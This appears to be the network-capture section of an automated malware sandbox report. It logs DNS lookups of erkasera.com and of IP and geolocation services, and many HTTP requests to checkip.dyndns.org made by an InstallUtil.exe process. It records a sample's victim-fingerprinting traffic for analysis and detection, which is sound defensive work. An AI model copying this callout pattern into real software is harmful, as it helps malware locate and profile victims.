                                              Oct 28, 2024 19:04:40.532152891 CET49759443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:40.536401987 CET4975880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:40.537512064 CET4976080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:40.543478012 CET8049758132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:40.543581963 CET4975880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:40.544068098 CET8049760132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:40.544152975 CET4976080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:40.544444084 CET4976080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:40.551820993 CET8049760132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:41.401293039 CET8049760132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:41.403429031 CET49761443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:41.403522015 CET44349761188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:41.403667927 CET49761443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:41.404048920 CET49761443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:41.404087067 CET44349761188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:41.453248024 CET4976080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:42.051501989 CET44349761188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:42.054219961 CET49761443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:42.054279089 CET44349761188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:42.212574959 CET44349761188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:42.212651014 CET44349761188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:42.212745905 CET49761443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:42.213375092 CET49761443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:42.217650890 CET4976080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:42.219300985 CET4976280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:42.223803043 CET8049760132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:42.223906040 CET4976080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:42.224663973 CET8049762132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:42.224740982 CET4976280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:42.224889040 CET4976280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:42.230674028 CET8049762132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:43.099031925 CET8049762132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:43.101110935 CET49763443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:43.101219893 CET44349763188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:43.101448059 CET49763443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:43.101730108 CET49763443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:43.101768017 CET44349763188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:43.140918016 CET4976280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:43.702303886 CET44349763188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:43.704854965 CET49763443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:43.704917908 CET44349763188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:43.856975079 CET44349763188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:43.857057095 CET44349763188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:43.857115984 CET49763443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:43.857546091 CET49763443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:43.860932112 CET4976280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:43.862241030 CET4976480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:43.866586924 CET8049762132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:43.866662979 CET4976280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:43.867777109 CET8049764132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:43.867855072 CET4976480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:43.867958069 CET4976480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:43.873358965 CET8049764132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:44.730232954 CET8049764132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:44.731589079 CET49765443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:44.731653929 CET44349765188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:44.731748104 CET49765443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:44.732290983 CET49765443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:44.732311010 CET44349765188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:44.781402111 CET4976480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:45.341197968 CET44349765188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:45.342699051 CET49765443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:45.342732906 CET44349765188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:45.494141102 CET44349765188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:45.494210005 CET44349765188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:45.494268894 CET49765443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:45.494769096 CET49765443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:45.498558044 CET4976480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:45.499628067 CET4976680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:45.504389048 CET8049764132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:45.504451036 CET4976480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:45.505053997 CET8049766132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:45.505124092 CET4976680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:45.505220890 CET4976680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:45.510550976 CET8049766132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:46.404679060 CET8049766132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:46.405972004 CET49767443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:46.406007051 CET44349767188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:46.406090021 CET49767443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:46.406322002 CET49767443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:46.406337023 CET44349767188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:46.453351974 CET4976680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:47.052164078 CET44349767188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:47.053899050 CET49767443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:47.053926945 CET44349767188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:47.224698067 CET44349767188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:47.224746943 CET44349767188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:47.224797010 CET49767443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:47.225203037 CET49767443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:05:25.153326988 CET8049734132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:05:25.153570890 CET4973480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:05:33.662194014 CET8049750132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:05:33.662374020 CET4975080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:05:43.170407057 CET8049756132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:05:43.170469046 CET4975680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:05:51.544769049 CET8049766132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:05:51.544836998 CET4976680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:06:08.547365904 CET4975080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:06:08.553354025 CET8049750132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:06:26.407280922 CET4976680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:06:26.413105011 CET8049766132.226.247.73192.168.2.4
                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 28, 2024 19:04:06.795861006 CET5576753192.168.2.41.1.1.1
                                              Oct 28, 2024 19:04:06.968887091 CET53557671.1.1.1192.168.2.4
                                              Oct 28, 2024 19:04:15.957389116 CET6113153192.168.2.41.1.1.1
                                              Oct 28, 2024 19:04:15.965699911 CET53611311.1.1.1192.168.2.4
                                              Oct 28, 2024 19:04:17.181040049 CET6028153192.168.2.41.1.1.1
                                              Oct 28, 2024 19:04:17.190368891 CET53602811.1.1.1192.168.2.4
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 28, 2024 19:04:06.795861006 CET192.168.2.41.1.1.10xed2bStandard query (0)erkasera.comA (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:15.957389116 CET192.168.2.41.1.1.10xac19Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:17.181040049 CET192.168.2.41.1.1.10x1d7cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 28, 2024 19:04:06.968887091 CET1.1.1.1192.168.2.40xed2bNo error (0)erkasera.com188.132.193.46A (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:15.965699911 CET1.1.1.1192.168.2.40xac19No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Oct 28, 2024 19:04:15.965699911 CET1.1.1.1192.168.2.40xac19No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:15.965699911 CET1.1.1.1192.168.2.40xac19No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:15.965699911 CET1.1.1.1192.168.2.40xac19No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:15.965699911 CET1.1.1.1192.168.2.40xac19No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:15.965699911 CET1.1.1.1192.168.2.40xac19No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:17.190368891 CET1.1.1.1192.168.2.40x1d7cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Oct 28, 2024 19:04:17.190368891 CET1.1.1.1192.168.2.40x1d7cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              • erkasera.com
                                              • reallyfreegeoip.org
                                              • checkip.dyndns.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449731132.226.247.73807452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:15.980616093 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:16.857008934 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:16 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 1c469145d7445e6ef915e705d4ab6623
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                              Oct 28, 2024 19:04:16.861835957 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Oct 28, 2024 19:04:17.124233007 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f651155ea3ac9e8e614ababdd4c8a608
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                              Oct 28, 2024 19:04:18.096709967 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Oct 28, 2024 19:04:18.357861042 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: e39aefabbdbd2cf3310e8eff3b1db579
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449734132.226.247.73807452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:19.133683920 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Oct 28, 2024 19:04:20.013550997 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 25295319dd5879369d35aaa76a4cb4ee
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.449736132.226.247.73807452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:20.833590031 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:21.702743053 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:21 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 884ed70787d8f4f7bbb4c04cc9a62664
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.449738132.226.247.73807452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:22.546587944 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:23.419681072 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: a7e6508fc5e2875cc51f44569e9d89cb
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              4192.168.2.449742132.226.247.73807452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:24.273741007 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:25.148843050 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 955107858372f02cfeb339103777209d
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              5192.168.2.449747132.226.247.73807452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:25.955662966 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:26.820468903 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:26 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: e32b6f49688b9f5bf626d18166b3d439
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449750132.226.247.73807452C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:27.671659946 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:28.531817913 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:28 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 8a9b2071c4710e1b84b8961f0afdef0a
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449753132.226.247.73808028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:34.060961008 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:34.912925959 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 07e04549ffe3657539ba837c37ffafcd
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                              Oct 28, 2024 19:04:34.917491913 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Oct 28, 2024 19:04:35.172844887 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 77e4c0ebb84e84cac234faa278f80693
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>
                                              Oct 28, 2024 19:04:36.081614017 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Oct 28, 2024 19:04:36.338349104 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:36 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 412efe54f1e0a2fb118326c957fee217
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449756132.226.247.73808028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:37.165872097 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Oct 28, 2024 19:04:38.034620047 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:37 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: fb4b5b0cb6186201a8cd7c2f20551c99
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.188</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449758132.226.247.73808028C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 28, 2024 19:04:38.856770992 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Oct 28, 2024 19:04:39.731909037 CET323INHTTP/1.1 200 OK
                                              Date: Mon, 28 Oct 2024 18:04:39 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 91bc21a9f6fc193a2da12df36a7a153b
